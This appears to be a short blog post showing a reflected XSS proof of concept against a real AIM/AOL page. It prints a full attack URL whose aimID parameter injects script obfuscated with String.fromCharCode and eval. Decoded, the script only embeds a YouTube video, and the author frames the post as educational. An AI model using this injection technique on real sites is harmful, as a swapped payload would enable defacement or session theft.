See the attack and video live on the page
or watch below (ill have this link live as long as it works)The javascript we inject is shown below
which url encodes to...
http://www.aim.com/features/aimandfacebook?aimID=carterkixass%3Cbr%3E%3Cscript%3Eeval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,111,98,106,101,99,116,32,119,105,100,116,104,61,52,56,48,32,104,101,105,103,104,116,61,51,56,53,62,60,112,97,114,97,109,32,110,97,109,101,61,39,109,111,118,105,101,39,32,118,97,108,117,101,61,39,104,116,116,112,58,47,47,119,119,119,46,121,111,117,116,117,98,101,46,99,111,109,47,118,47,56,70,119,82,80,48,112,78,83,106,99,63,102,115,61,49,38,97,109,112,59,104,108,61,101,110,95,85,83,38,97,109,112,59,114,101,108,61,48,39,62,60,47,112,97,114,97,109,62,60,101,109,98,101,100,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,121,111,117,116,117,98,101,46,99,111,109,47,118,47,56,70,119,82,80,48,112,78,83,106,99,63,102,115,61,49,38,97,109,112,59,104,108,61,101,110,95,85,83,38,97,109,112,59,114,101,108,61,48,39,32,116,121,112,101,61,39,97,112,112,108,105,99,97,116,105,111,110,47,120,45,115,104,111,99,107,119,97,118,101,45,102,108,97,115,104,39,32,119,105,100,116,104,61,52,56,48,32,104,101,105,103,104,116,61,51,56,53,62,60,47,101,109,98,101,100,62,60,47,111,98,106,101,99,116,62,34,41,59))%3C/script%3EThis is a demonstration of a live attack meant for educational purposes only... if you want to see my copy is here: AOL XSS attack landing page If you are having issues with XSS attacks on your domain or would like help on securing your application, contact me id love to help
P.S. the tool I used to do string encoding is here
